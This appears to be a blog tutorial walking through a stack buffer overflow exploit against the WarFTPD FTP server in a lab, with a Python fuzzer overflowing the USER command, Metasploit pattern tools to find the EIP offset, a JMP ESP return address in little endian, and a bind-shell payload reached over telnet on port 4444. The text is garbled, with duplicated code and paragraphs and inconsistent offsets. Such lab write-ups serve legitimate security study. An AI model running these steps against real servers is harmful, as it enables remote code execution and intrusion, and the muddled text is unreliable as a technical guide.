Buffer overflow itself is a process that goes on inside a computer memory system in which there is an normal process at the time of the temporary data storage in memory i.e. when there is data that will be stored exceeds the capacity of the buffer (temporary storage) in memory.
FUZZER
fuzzer itself is a word that is widely used in the world of science technology one is fuzzy logic, but this discussion on fuzzer no his relationship with fuzzy logic, Fuzzer is a mention to the applications used on the process of fuzzing.
FUZZING
fuzzing is an early stage which is sure to be done by a security researcher, an application will be in line to manage the data that is not normal, so it will be seen how applications handle data as well as the process of error handling by the application, from the process here, a researcher can see if there's a gap in security application that can be exploited.
Toolstools that will be used as follows :
* Ollydbg as a debugger
* Fuzzer to do the process Fuzzing
* Phyton, used to create an application fuzzer and exploit
WarFTPD
Applications that will be used as the target is the application of WarFTPD made by Jarle (jgaa) Aase, is an FTP server application running on a Windows operating system.as seen in the image below :
For the application, to be exploited is an FTP server application, so here I am trying to make a simple fuzzer can send data at FTP protocol. the fuzzer is created using a language Python.
as the example below :
#!/usr/bin/python
import socket
s= socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer ="\x41" * 1000
as the example below :
#!/usr/bin/python
import socket
s= socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer ="\x41" * 1000
s . connect (('192.168.56.101 ' ,21))
data =s.recv (1024)
print("sendingevildatavia USER command...")
s.send('USER '+buffer+'\r \n')
data = s.recv (1024)
s.send('PASS PASSWORD'+'\r \n')
s.close()
print ("Finish")
print("sendingevildatavia USER command...")
s.send('USER '+buffer+'\r \n')
data = s.recv (1024)
s.send('PASS PASSWORD'+'\r \n')
s.close()
print ("Finish")
To run WarFTP server, select the Start menu Properties-> Service
the status of WarFTP will become idle.To check whether the server is running and can be
contacted via the BackTrack system, try to connect to FTP using NC, run
the following command :
the
next process is to try to run an application fuzzer which adauntuk runs
when the command line, make sure that the window's previous Virtualbox
can be seen clearly, the goal is to see what happens to the application
server WarFTP.root@bt:~#python BackTrack.py
This time will also be used as an application for Ollydbg perform debugging on an application server WarFTP
for Ollydbg can see what happens when the application
crashes, run WarFTP server through applications, when Ollydbg WarFTP
server application tried to run back, then an Error message will appear.
* delete the file FtpDaemon.
then it would appear like the following :
to prevent the occurrence of such error appeared again during the process of development, please follow these steps :
* delete the file FtpDaemon.
* run WarFTP server application again.
* create a user through the User Security dummies.
|
run WarFTP back when walking normally without the memuculkan error messages, run WarFTP server applications through the Ollydbg.
|
then it would appear like the following :
lets go , now through the application Konsole on BackTrack, go into the folder, such as the following :
#cd /opt/metasploit/msf3/tools/
#cd /opt/metasploit/msf3/tools/
If it looks pattern_create.rb
run to generate as much as 1000 byte data, run like this :
./pattern_create.rb 1000 > string_pattern.txt
run to generate as much as 1000 byte data, run like this :
./pattern_create.rb 1000 > string_pattern.txt
look the strings as much as 1000 characters, starting from the character "Aa0Aa1Aa2Aa3A" until the character "Bh0Bh1Bh2B"
After the string pattern has been successfully created, the next step enter this data into an application fuzzer which has previously been made, the data pattern that is going to replace the character "A" data on a fuzzer, use a text editor to modify existing scripts in an application fuzzer.
After changing into a collection of pattern strings generate results from pattern_create. rb, continue the next step, run WarFTP server applications through the Ollydbg.
493 -> to achieve the required data stack of 493 bytes
now continue by entering such a fuzzer script below, and proceed with as the previous step..
now consider the value that appears in the window stack and registers in Ollydbg, seen that the value in register EIP be DEADBEEF.
the input JMP ESP in window and press the find Command Find
Now we will go on the payload, payload that will choose in the next build, Metasploit will display the configuration menu of the payload type of the shell as it looks like the following figure,don't forget after you finish press generate to generate the payload has been selected.:
now live the payload that is insert the code into the application that has been used previously, such as the following:
now run WarFTP Ollydbg and again as before, if not in error then run with # telnet 192.168.56.101 4444, then it will occur as follows :
After the string pattern has been successfully created, the next step enter this data into an application fuzzer which has previously been made, the data pattern that is going to replace the character "A" data on a fuzzer, use a text editor to modify existing scripts in an application fuzzer.
After changing into a collection of pattern strings generate results from pattern_create. rb, continue the next step, run WarFTP server applications through the Ollydbg.
Unlike before, the current value from the register in
the memory the application server is fully WarFTP with string pattern
that had been incorporated into an application fuzzer, note the data
contained in the register.Now use the pettern_offset application will calculate
how many bytes of data from the initial pattern to stirng contained in
such registers
do konsole as below :
#./pattern_offset.rb 32714131-> Nilai EIP
486 -> EIP It takes data of 485 bytes
#./pattern_offset.rb q4Aq5Aq-> Nilai ESP486 -> EIP It takes data of 485 bytes
493 -> to achieve the required data stack of 493 bytes
now continue by entering such a fuzzer script below, and proceed with as the previous step..
run the application using the Ollydbg, on a Special Executable modules,
then it would appear like the following.
If
it looks like the above, proceed to determine which libraries you want
to use, double click on the file name, then it will appear as follows.
It appears as below, now do right click in the main window: Search For-> Command.
the input JMP ESP in window and press the find Command Find
then it will look 7E429353 address JMP ESP, it's on me,
such as the following:
the
next thing to do is change the offset address into little endian
format, from 7E429353 to \x53\x93\x42\x7E, note the following script:
now run WarFTP Ollydbg and again as before,
then it will appear as follows:
now run WarFTP Ollydbg and again as before,
right-click the selected Breakpoint-> memory, on access.
next run on the console, run the ./msfweb.
Now we will go on the payload, payload that will choose in the next build, Metasploit will display the configuration menu of the payload type of the shell as it looks like the following figure,don't forget after you finish press generate to generate the payload has been selected.:
now live the payload that is insert the code into the application that has been used previously, such as the following:
now run WarFTP Ollydbg and again as before, if not in error then run with # telnet 192.168.56.101 4444, then it will occur as follows :
No comments:
Post a Comment